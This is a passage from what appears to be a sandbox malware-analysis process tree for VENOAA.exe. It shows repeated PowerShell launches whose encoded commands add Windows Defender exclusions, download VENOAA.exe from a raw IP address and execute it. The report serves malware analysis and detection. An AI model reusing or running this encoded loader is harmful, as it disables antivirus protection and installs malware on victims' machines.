AG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="82⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1588 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"83⤵
- Checks computer location settings
- Executes dropped EXE
PID:1496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="84⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3640 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"85⤵
- Checks computer location settings
- Executes dropped EXE
PID:4736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="86⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3040 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV187⤵PID:4356
-
-
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"87⤵
- Executes dropped EXE
PID:4800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="88⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4548 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"89⤵
- Executes dropped EXE
PID:3496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="90⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4828 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"91⤵
- Executes dropped EXE
PID:3256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="92⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3080 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"93⤵
- Checks computer location settings
- Executes dropped EXE
PID:8 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="94⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"95⤵
- Checks computer location settings
- Executes dropped EXE
PID:3104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="96⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4200 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"97⤵
- Executes dropped EXE
PID:4444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="98⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"99⤵
- Executes dropped EXE
PID:3384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="100⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4308 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"101⤵
- Checks computer location settings
- Executes dropped EXE
PID:2132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="102⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4656 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"103⤵
- Checks computer location settings
- Executes dropped EXE
PID:3952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="104⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"105⤵
- Executes dropped EXE
PID:4360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="106⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3520 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"107⤵
- Executes dropped EXE
PID:3536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAA